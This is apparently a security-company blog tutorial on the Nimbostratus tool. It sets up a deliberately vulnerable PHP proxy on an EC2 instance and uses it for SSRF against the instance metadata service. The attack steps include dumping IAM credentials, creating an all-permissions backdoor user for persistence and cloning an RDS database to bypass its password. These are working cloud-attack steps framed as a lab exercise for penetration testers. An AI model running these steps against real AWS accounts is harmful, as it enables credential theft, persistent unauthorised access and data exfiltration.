Introduction

Nimbostratus is a tool developed by Andres Riancho for fingerprinting and exploiting Amazon cloud infrastructures. Nimbostratus uses any application level HTTP proxy vulnerability to enumerate the instance and credentials from the metadata service which is available to all the instances in EC2. This tool-set can be tested on nimbostratus-target, which helps you set up a legal environment where the enumeration can be performed. If you were wondering what Nimbostratus means, Nimbostratus is the name of an actual cloud. In this article, we will see how to install Nimbostratus and Nimbostratus-target, set up the target environment and then enumerating the target for further exploitation.

Installation

Installing Nimbostratus

git clone [email protected]:andresriancho/nimbostratus.git
cd nimbostratus
pip install -r requirements.txt

Installing nimbostratus-target

sudo apt-get install python-mysqldb
git clone [email protected]:andresriancho/nimbostratus-target.git
cd nimbostratus-target
pip install -r requirements.txt
Prerequisites

Amazon AWS account:

The primary requirement for testing nimbostratus is to create an AWS account and create your access keys. You can create a free AWS account. I would request you to go through the limitations of a free tier account to avoid unpredicted charges.

Creating a user:

To create a user select users from the left-hand pane in your IAM management console. Create a new user and assign Programmatic access. In the following page select Attach existing policies directly and assign a policy like AdministratorAccess. Go to the next page and review your chosen options and proceed to create your user.

Creating your access keys:

These are the access keys that will be required for our post-exploitation process. Once a user is created you will receive your credentials which will comprise of an access key and a secret key. You can additionally view your access credentials by selecting the particular user that was created.

Boto library:

Boto is a Python package that provides interfaces to Amazon Web Services. Currently, all features work with Python 2.6 and 2.7. Nimbostratus is developed using the great boto library for accessing Amazon’s API.

Usage

Dump EC2 meta-data

Each time an EC2 instance starts, AWS attaches a meta-data server to it, which can be accessed from the instance itself using http://169.254.169.254/.The instance meta-data stores information such as  AMI id , operating system which was used to boot the instance, Private IP address, Instance type, number of cores, memory, Amazon region, etc

This function basically depends on the meta-data service and a web application with an HTTP proxy vulnerability running on the instance. After the HTTP proxy is exploited, we can use this vulnerability to send requests to metadata service from the attacker machine. For this demonstration, we will set up a simple ubuntu instance with apache and php running a vulnerable web app that has a vulnerable proxy function.

Setting up the target instance

In this demo, we will be creating our own target and will not be using the nimbostratus-target. You can also perform the same operations on an instance setup using nimbostratus-target. The first step in creating a target is creating an IAM role which will be attached to a new EC2 instance running an Ubuntu OS. Launch the instance using the EC2 AWS console with an IAM role configured.

Next, we will have to set up a vulnerable web app on the target machine. Log into the target machine through ssh and run the following steps,

For this demo, we will create a php file with an un-validated proxy function. Let’s use a simple php proxy script (greenido’s php proxy script from here) to create an index.php file inside the var/www/html folder.

Log into the instance using ssh, navigate to the var/www/html

sudo apt install apache2
sudo apt install php
sudo chmod -R a+rw /var/www
cd /var/www/html
curl https://gist.githubusercontent.com/greenido/2689639/raw/d95439f6dff5b8d0964366e69106226133900f9b/cUrl_proxy.php >> index.php
sudo service apache2 restart

Now we have an EC2 instance which is running a vulnerable HTTP web proxy. The greenido’s php script has an ‘url’ parameter which will contain the URL to be connected through the proxy.

We can test this by opening the public IP address of the instance through the browser in our machine ( The attacker’s machine)

Fingerprinting using dump-ec2-metadata function

Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.

Nimbostratus has a python file called mangle.py inside the core -> utils folder which has to be updated with the target URL.

Insert the target’s proxy vulnerable URL in the VULN_URLvariable and save the file. Now, let’s run the dump-metadata function using the updated mangle function.

./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle

Nimbostratus queries the instance’s meta data service to gather all the data which is available

We can see that the dump-ec2-metadata function of the nimbostratus dumps all the data available in the metadata server. We can also see that the output contains other juicy information like the Access key and secret of the IAM role attached to this instance.

Dump credentials:

This function will enumerate the meta-data service of the target using the mangle function and retrieve any access key credentials that found on the meta-data server.

./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle

Once we are able to enumerate the Access keys of the IAM role attached to the Instance, we can further enumerate the permissions present on the IAM role account using the dump-permissions function.

Dump permissions:

This tool will dump all permissions for the provided credentials. This tool is preferably used right after dump-credentials to know which permissions are available for you. Let’s imagine that the IAM role a lenient policy, a successful execution of the command would look like:

./nimbostratus  dump-permissions --access-key=**************PXXQ --secret-key=******************************** --token ********************************************


Create a new user:

While exploitation, if you’ve got credentials of a root user or if the IAM role had administrative access policy tied to it, this will allow you to create a new user using IAM. This tool will create it, assigning the new user with permissions to access all Amazon resources and returns the Access key and secret. It assigns a random name to the created user and attaches a policy which looks like this:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": "*"
        }
    ]
}

We will execute this command and demonstrate it’s function

./nimbostratus -v create-iam-user --access-key **************UFUA --secret-key **************************************DDxSZ --token ****************************************tecaoI

We can see the new user created in IAM console,

This user account can be used for further exploitation and for maintaining access to the resources.

Create a Database Snapshot:

Amazon RDS is Amazon Relational Database Service (Amazon RDS) which makes it easy to set up, operate, and scale a relational database in the cloud. It provides cost-efficient and resizable capacity while automating time-consuming administration tasks such as hardware provisioning, database setup, patching and backups.

For testing this section, we will have to create a DB instance in RDS. Make sure you follow the details in https://aws.amazon.com/rds/free/ to create a DB instance under Amazon Free Tier.

Basically, the snapshot-rds function is used to create a snapshot of a DB instance running in AWS RDS and restores the snapshot on a new DB instance with a user-provided password. This will help the user to access the contents of the database instance without knowing the master database password. Please note that the latest AWS API do not support the modifying VPC information of the DB instance, please use API versions between 2012-01-15 and 2012-10-31 to use that functionality.

We would need the know if there is a DB instance running on the AWS, its name, and its region. We will use the newly created admin user account which we created using create-iam-user function in the previous step for this function. We will also provide the master password for the cloned DB instance which we can use later to connect to that instance.

./nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-key *****************************yDDxSZ --token ************************************************K2g2QU= --rds-name testdb --password ********* --region us-west-2

This creates a snapshot and restores that snapshot as a separate instance in RDS

Nimbostratus can also be created a VPC on the RDS instance which will allow anyone on the internet to access it as root with the password provided.

This cloned RDS instance can be connected remotely from the attacker machine using the instance details and password that we provided and this DB can be used for exploitation.

Conclusion

Nimbostratus is an amazing post exploitation tool to enumerate and fingerprint AWS resources. It can also exploit the instances if there are insecure default configurations on tools such as celery running in the instance. Thank you for reading! – Setu Parimi, Steve George & Indranil Roy

Sign up for the blog directly here.

Check out our professional services here.

Feedback is welcome! For professional services, fan mail, hate mail, or whatever else, contact [email protected]


Leave a Reply

Your email address will not be published. Required fields are marked *

%d bloggers like this: